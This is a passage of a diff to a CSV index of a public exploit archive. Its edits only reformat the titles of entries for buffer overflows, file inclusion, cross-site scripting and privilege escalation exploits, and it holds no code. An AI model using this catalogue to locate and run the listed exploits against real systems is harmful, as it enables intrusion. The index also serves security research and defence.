Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0 -21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0 +21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0 21226,platforms/linux/local/21226.c,"IMLib2 Home Environment Variable Buffer Overflow",2002-01-13,"Charles Stevenson",linux,local,0 21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution",2002-01-14,"Charles Stevenson",linux,local,0 21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",windows,dos,0 @@ -18528,7 +18524,7 @@ id,file,description,date,author,platform,type,port 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - .Manifest Denial of Service",2002-01-21,mosestycoon,windows,dos,0 21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",php,webapps,0 21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution",2002-01-25,sorbo,linux,remote,0 -21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 +21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21245,platforms/windows/dos/21245.c,"Microsoft Windows 2000/NT 4 - TCP Stack DoS (1)",2001-04-13,3APA3A,windows,dos,0 21246,platforms/windows/dos/21246.c,"Microsoft Windows 2000/NT 4 - TCP Stack DoS (2)",2001-04-13,3APA3A,windows,dos,0 @@ -18558,17 +18554,17 @@ id,file,description,date,author,platform,type,port 21272,platforms/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,asp,webapps,0 21273,platforms/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",php,webapps,0 21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote,0 -21275,platforms/osx/dos/21275.c,"ICQ For MacOS X 2.6 Client Denial of Service",2002-02-05,Stephen,osx,dos,0 +21275,platforms/osx/dos/21275.c,"ICQ For MacOS X 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0 21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Path Disclosure",2002-02-06,phinegeek,multiple,remote,0 21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 - Index.php Directory Traversal",2002-02-04,frog,php,webapps,0 21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 - View.php Directory Traversal",2002-02-04,frog,php,webapps,0 -21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 Cookie Manipulation",2002-02-04,frog,php,webapps,0 +21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,php,webapps,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0 21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Relative Path Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0 21283,platforms/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local,0 -21284,platforms/unixware/local/21284.c,"Caldera UnixWare 7.1.1 Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local,0 -21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0 +21284,platforms/unixware/local/21284.c,"Caldera UnixWare 7.1.1 - Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local,0 +21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0 21286,platforms/windows/remote/21286.c,"Apple QuickTime 5.0 - Content-Type Remote Buffer Overflow",2002-02-08,UNYUN,windows,remote,0 21287,platforms/cgi/remote/21287.pl,"EZNE.NET Ezboard 2000 - Remote Buffer Overflow",2002-02-11,"Jin Ho You",cgi,remote,0 21288,platforms/multiple/local/21288.txt,"Sawmill 6.2.x - AdminPassword Insecure Default Permissions",2002-02-11,darky0da,multiple,local,0 @@ -18576,31 +18572,31 @@ id,file,description,date,author,platform,type,port 21290,platforms/unix/local/21290.sh,"Tarantella Enterprise 3 Symbolic Link",2002-02-19,"Larry W. Cashdollar",unix,local,0 21291,platforms/windows/remote/21291.pl,"phusion webserver 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",windows,remote,0 21292,platforms/windows/remote/21292.pl,"phusion webserver 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",windows,remote,0 -21293,platforms/windows/dos/21293.pl,"Phusion Webserver 1.0 Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos,0 -21294,platforms/windows/remote/21294.c,"Phusion Webserver 1.0 Long URL Buffer Overflow",2002-02-16,"Alex Hernandez",windows,remote,0 +21293,platforms/windows/dos/21293.pl,"Phusion Webserver 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos,0 +21294,platforms/windows/remote/21294.c,"Phusion Webserver 1.0 - Long URL Buffer Overflow",2002-02-16,"Alex Hernandez",windows,remote,0 21295,platforms/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",multiple,remote,0 21296,platforms/hardware/dos/21296.c,"Cisco IOS 11/12 - Malformed SNMP Message Denial of Service",2002-02-12,kundera,hardware,dos,0 -21297,platforms/unix/remote/21297.c,"Squid 2.0-4 Cache FTP Proxy URL Buffer Overflow",2002-02-21,gunzip,unix,remote,0 -21298,platforms/windows/remote/21298.c,"Essentia Web Server 2.1 Long URL Buffer Overflow",2003-07-04,B-r00t,windows,remote,0 -21299,platforms/php/webapps/21299.txt,"Powie PForum 1.1x Username Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps,0 +21297,platforms/unix/remote/21297.c,"Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow",2002-02-21,gunzip,unix,remote,0 +21298,platforms/windows/remote/21298.c,"Essentia Web Server 2.1 - Long URL Buffer Overflow",2003-07-04,B-r00t,windows,remote,0 +21299,platforms/php/webapps/21299.txt,"Powie PForum 1.1x - Username Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps,0 21300,platforms/php/webapps/21300.txt,"XMB Forum 1.6 pre-beta - Image Tag Script Injection",2002-02-22,skizzik,php,webapps,0 21301,platforms/php/webapps/21301.txt,"OpenBB 1.0.x - Image Tag Cross-Agent Scripting",2002-02-25,skizzik,php,webapps,0 21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0 -21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 Triple-Dot-Slash Directory Traversal",2002-02-26,"Strumpf Noir Society",windows,remote,0 +21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 - Triple-Dot-Slash Directory Traversal",2002-02-26,"Strumpf Noir Society",windows,remote,0 21304,platforms/php/webapps/21304.txt,"Ikonboard 2.17/3.0/3.1 Image Tag Cross-Agent Scripting",2002-02-26,godminus,php,webapps,0 21305,platforms/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 21306,platforms/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft DoS Device Name Denial of Service",2002-02-27,3APA3A,windows,dos,0 -21308,platforms/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 Image Tag Cross-Agent Scripting",2002-02-27,Justin,asp,webapps,0 +21308,platforms/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 - Image Tag Cross-Agent Scripting",2002-02-27,Justin,asp,webapps,0 21309,platforms/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote,0 21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 - User Status Remote Information Disclosure",2002-02-27,spybreak,linux,remote,0 21311,platforms/windows/remote/21311.txt,"BPM Studio Pro 4.2 - HTTPD Directory Traversal",2002-02-27,UNTER,windows,remote,0 -21312,platforms/php/webapps/21312.txt,"ReBB 1.0 Image Tag Cross-Agent Scripting",2002-03-04,skizzik,php,webapps,0 +21312,platforms/php/webapps/21312.txt,"ReBB 1.0 - Image Tag Cross-Agent Scripting",2002-03-04,skizzik,php,webapps,0 21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure",2002-03-05,"David Litchfield",windows,remote,0 -21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One",2002-03-07,Morgan,unix,remote,0 +21314,platforms/unix/remote/21314.txt,"OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off-By-One",2002-03-07,Morgan,unix,remote,0 21317,platforms/php/webapps/21317.txt,"NeoBill CMS 0.8 Alpha - Multiple Vulnerabilities",2012-09-14,Vulnerability-Lab,php,webapps,0 21318,platforms/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 -21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF",2012-09-14,modpr0be,aix,webapps,0 +21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite - Stored XSS / CSRF",2012-09-14,modpr0be,aix,webapps,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager - SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps,0 21323,platforms/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 @@ -18615,7 +18611,7 @@ id,file,description,date,author,platform,type,port 21335,platforms/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - MultiFileUpload.php Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",php,remote,0 21336,platforms/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service",2002-03-08,"Alex Hernandez",windows,dos,0 21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service",2002-03-09,"H Zero Seven",multiple,dos,0 -21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 Garbage Denial of Service",2002-03-09,b0iler,linux,dos,0 +21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 - Garbage Denial of Service",2002-03-09,b0iler,linux,dos,0 21339,platforms/multiple/remote/21339.c,"Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0/0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 @@ -18637,9 +18633,9 @@ id,file,description,date,author,platform,type,port 21357,platforms/php/webapps/21357.txt,"PostNuke 0.703 - caselist Arbitrary Module Include",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21358,platforms/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21359,platforms/multiple/local/21359.c,"Progress 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local,0 -21360,platforms/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 XSun Color Database File Heap Overflow",2002-04-02,gloomy,solaris,local,0 +21360,platforms/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 - XSun Color Database File Heap Overflow",2002-04-02,gloomy,solaris,local,0 21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0 -21362,platforms/linux/local/21362.c,"Oracle 8i TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0 +21362,platforms/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 @@ -18676,7 +18672,7 @@ id,file,description,date,author,platform,type,port 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps,0 -21398,platforms/linux/local/21398.txt,"SSH2 3.0 Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0 +21398,platforms/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0 21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 - Script Injection",2002-04-19,"Daniel Nyström",php,webapps,0 21400,platforms/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - Members.ASP SQL Injection",2002-04-19,acemi,asp,webapps,0 21401,platforms/php/webapps/21401.txt,"PostBoard 2.0 - BBCode IMG Tag Script Injection",2002-04-19,gcsb,php,webapps,0 @@ -18686,16 +18682,16 @@ id,file,description,date,author,platform,type,port 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps,0 21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 21407,platforms/bsd/local/21407.c,"OS X 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 -21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 -21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 +21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 +21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 21410,platforms/windows/remote/21410.pl,"Matu FTP 1.74 - Client Buffer Overflow",2002-04-23,Kanatoko,windows,remote,0 21411,platforms/cgi/webapps/21411.txt,"vqServer 1.9.x - CGI Demo Program Script Injection",2002-04-21,"Matthew Murphy",cgi,webapps,0 21412,platforms/unix/remote/21412.txt,"Apache Tomcat 4.0/4.1 - Servlet Path Disclosure",2002-04-23,"CHINANSL Security Team",unix,remote,0 21413,platforms/multiple/dos/21413.txt,"National Instruments LabVIEW 5.1.1/6.0/6.1 - HTTP Request Denial of Service",2002-04-19,"Steve Zins",multiple,dos,0 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x - Braille Module Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0 -21415,platforms/cgi/remote/21415.txt,"CGIScript.NET csMailto Hidden Form Field Remote Command Execution",2002-04-23,"Steve Gustin",cgi,remote,0 +21415,platforms/cgi/remote/21415.txt,"CGIScript.NET - csMailto Hidden Form Field Remote Command Execution",2002-04-23,"Steve Gustin",cgi,remote,0 21416,platforms/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service",2002-04-24,"Berend-Jan Wever",windows,dos,0 -21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 +21417,platforms/hardware/webapps/21417.py,"Thomson Wireless VoIP Cable Modem - Auth Bypass",2012-09-20,"Glafkos Charalambous ",hardware,webapps,0 21418,platforms/php/webapps/21418.txt,"Manhali 1.8 - Local File Inclusion",2012-09-20,L0n3ly-H34rT,php,webapps,0 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 @@ -18714,13 +18710,13 @@ id,file,description,date,author,platform,type,port 21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher - Cross-Site Scripting",2002-05-05,frog,cgi,webapps,0 21436,platforms/php/webapps/21436.txt,"B2 0.6 - b2edit.showposts.php b2inc Parameter Remote File Inclusion",2002-05-06,Frank,php,webapps,0 -21437,platforms/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd Heap Overflow",2002-01-01,"Last Stage of Delirium",solaris,remote,0 +21437,platforms/solaris/remote/21437.c,"Solaris 2/7/8/9 cachefsd - Heap Overflow",2002-01-01,"Last Stage of Delirium",solaris,remote,0 21438,platforms/windows/remote/21438.txt,"WorldClient 5.0.x - Arbitrary File Deletion",2002-05-07,Obscure,windows,remote,0 21439,platforms/windows/remote/21439.txt,"MDaemon WorldClient 5.0.x - Folder Creation Buffer Overflow",2002-05-07,Obscure,windows,remote,0 -21440,platforms/bsd/remote/21440.c,"ISC DHCPD 2.0/3.0.1 NSUPDATE Remote Format String",2002-05-08,Andi,bsd,remote,0 +21440,platforms/bsd/remote/21440.c,"ISC DHCPD 2.0/3.0.1 - NSUPDATE Remote Format String",2002-05-08,Andi,bsd,remote,0 21441,platforms/hardware/remote/21441.txt,"Cisco ATA-186 - HTTP Device Configuration Disclosure",2002-05-09,"Patrick Michael Kane",hardware,remote,0 -21442,platforms/linux/remote/21442.c,"Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow (1)",2002-05-10,korty,linux,remote,0 -21443,platforms/linux/remote/21443.c,"Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow (2)",2002-05-10,"0x3a0x29 crew",linux,remote,0 +21442,platforms/linux/remote/21442.c,"Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1)",2002-05-10,korty,linux,remote,0 +21443,platforms/linux/remote/21443.c,"Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2)",2002-05-10,"0x3a0x29 crew",linux,remote,0 21444,platforms/multiple/remote/21444.txt,"Critical Path InJoin Directory Server 4.0 - Cross-Site Scripting",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 21445,platforms/multiple/remote/21445.txt,"Critical Path InJoin Directory Server 4.0 - File Disclosure",2002-05-10,"Nomad Mobile Research Centre",multiple,remote,0 21446,platforms/windows/remote/21446.txt,"Ecometry SGDynamo 5.32/6.1/7.0 - Cross-Site Scripting",2002-04-17,frog,windows,remote,0 @@ -18728,7 +18724,7 @@ id,file,description,date,author,platform,type,port 21448,platforms/php/webapps/21448.txt,"XMB Forum 1.6 - Magic Lantern Log File",2002-05-11,frog,php,webapps,0 21449,platforms/php/webapps/21449.txt,"NOCC 0.9.x - Webmail Script Injection",2002-05-14,ppp-design,php,webapps,0 21450,platforms/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 - Remote Information Disclosure",2002-05-15,Redix,multiple,remote,0 -21451,platforms/windows/remote/21451.txt,"Opera 5.12/6.0 Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",windows,remote,0 +21451,platforms/windows/remote/21451.txt,"Opera 5.12/6.0 - Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",windows,remote,0 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 - Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0 21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 21454,platforms/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,php,webapps,0 @@ -18736,7 +18732,7 @@ id,file,description,date,author,platform,type,port 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0 21457,platforms/asp/webapps/21457.txt,"Hosting Controller 1.4 - Import Root Directory Command Execution",2002-05-17,hdlkha,asp,webapps,0 21458,platforms/linux/local/21458.txt,"grsecurity Kernel Patch 1.9.4 - Linux Kernel Memory Protection Weakness",2002-05-17,"Guillaume PELAT",linux,local,0 -21459,platforms/php/webapps/21459.txt,"Phorum 3.3.2 a Remote Command Execution",2002-05-17,"markus arndt",php,webapps,0 +21459,platforms/php/webapps/21459.txt,"Phorum 3.3.2 a - Remote Command Execution",2002-05-17,"markus arndt",php,webapps,0 21460,platforms/cgi/webapps/21460.pl,"CGIScript.net 1.0 - Information Disclosure",2002-05-17,"Steve Gustin",cgi,webapps,0 21461,platforms/php/webapps/21461.txt,"Phorum 3.3.2 - Cross-Site Scripting",2002-05-18,"markus arndt",php,webapps,0 21462,platforms/freebsd/local/21462.sh,"FreeBSD 4.x - Process Concealment Bypass",2002-05-18,anonymous,freebsd,local,0 @@ -18765,38 +18761,38 @@ id,file,description,date,author,platform,type,port 21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT4 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0 21486,platforms/php/webapps/21486.txt,"PHPBB2 Image Tag HTML Injection",2002-05-26,"Martijn Boerwinkel",php,webapps,0 21487,platforms/cgi/webapps/21487.pl,"Image Display System 0.8.1 - Directory Existence Disclosure",2002-05-28,isox,cgi,webapps,0 -21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 Information Disclosure",2002-05-29,Procheckup,novell,remote,0 -21489,platforms/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 SCOAdmin Symbolic Link",2002-05-29,"Kevin Finisterre",sco,local,0 +21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0 +21489,platforms/sco/local/21489.txt,"Caldera OpenServer 5.0.5/5.0.6 - SCOAdmin Symbolic Link",2002-05-29,"Kevin Finisterre",sco,local,0 21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - Source.JSP Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - RealPath.JSP Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21493,platforms/cfm/webapps/21493.txt,"Gafware CFXImage 1.6.4/1.6.6 ShowTemp File Disclosure",2002-05-29,"Richard Brain",cfm,webapps,0 21494,platforms/cgi/webapps/21494.txt,"CGIScript.net - csPassword.CGI 1.0 Information Disclosure",2002-05-30,"Steve Gustin",cgi,webapps,0 21495,platforms/cgi/webapps/21495.txt,"CGIScript.net - csPassword.CGI 1.0 HTAccess File Modification",2002-05-30,"Steve Gustin",cgi,webapps,0 -21496,platforms/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec Buffer Overflow (1)",2002-05-30,smurf,linux,local,0 -21497,platforms/linux/local/21497.pl,"IBM Informix SE 7.25 sqlexec Buffer Overflow (2)",2002-05-30,pHrail,linux,local,0 -21498,platforms/windows/dos/21498.c,"Evolvable Shambala Server 4.5 Web Server Denial of Service",2002-05-31,Shambala,windows,dos,0 +21496,platforms/linux/local/21496.c,"IBM Informix SE 7.25 sqlexec - Buffer Overflow (1)",2002-05-30,smurf,linux,local,0 +21497,platforms/linux/local/21497.pl,"IBM Informix SE 7.25 sqlexec - Buffer Overflow (2)",2002-05-30,pHrail,linux,local,0 +21498,platforms/windows/dos/21498.c,"Evolvable Shambala Server 4.5 - Web Server Denial of Service",2002-05-31,Shambala,windows,dos,0 21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0 -21499,platforms/linux/local/21499.txt,"QNX RTOS 4.25 CRTTrap File Disclosure",2002-05-31,"Simon Ouellette",linux,local,0 +21499,platforms/linux/local/21499.txt,"QNX RTOS 4.25 - CRTTrap File Disclosure",2002-05-31,"Simon Ouellette",linux,local,0 21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 - monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 - dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 -21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0 +21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 - su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0 21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation",2002-06-03,badc0ded,linux,local,0 21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation",2002-06-03,badc0ded,linux,local,0 21505,platforms/linux/local/21505.c,"QNX RTOS 6.1 - phlocale Environment Variable Buffer Overflow",2002-06-03,badc0ded,linux,local,0 -21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0 +21506,platforms/linux/local/21506.c,"QNX RTOS 6.1 - PKG-Installer Buffer Overflow",2002-06-03,badc0ded,linux,local,0 21507,platforms/linux/local/21507.sh,"QNX 6.x - 'ptrace()' Arbitrary Process Modification",2002-06-03,badc0ded,linux,local,0 21508,platforms/windows/dos/21508.py,"SafeNet Sentinel Keys Server Crash PoC",2012-09-24,retset,windows,dos,0 21509,platforms/php/webapps/21509.txt,"Teekai Tracking Online 1.0 - Cross-Site Scripting",2002-06-03,frog,php,webapps,0 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTCast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0 -21512,platforms/freebsd/dos/21512.txt,"Slurp 1.10 SysLog Remote Format String",2002-06-04,zillion,freebsd,dos,0 -21513,platforms/hardware/remote/21513.c,"Telindus 1100 Series Router Administration Password Leak",2002-06-05,rubik,hardware,remote,0 +21512,platforms/freebsd/dos/21512.txt,"Slurp 1.10 - SysLog Remote Format String",2002-06-04,zillion,freebsd,dos,0 +21513,platforms/hardware/remote/21513.c,"Telindus 1100 Series Router - Administration Password Leak",2002-06-05,rubik,hardware,remote,0 21514,platforms/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,php,webapps,0 21515,platforms/windows/remote/21515.txt,"Microsoft Internet Explorer 5/6 - FTP Web View Cross-Site Scripting",2002-06-06,"Eiji James Yoshida",windows,remote,0 -21516,platforms/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 Terminator Function Format String",2002-06-06,stringz,unix,local,0 +21516,platforms/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 - Terminator Function Format String",2002-06-06,stringz,unix,local,0 21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection 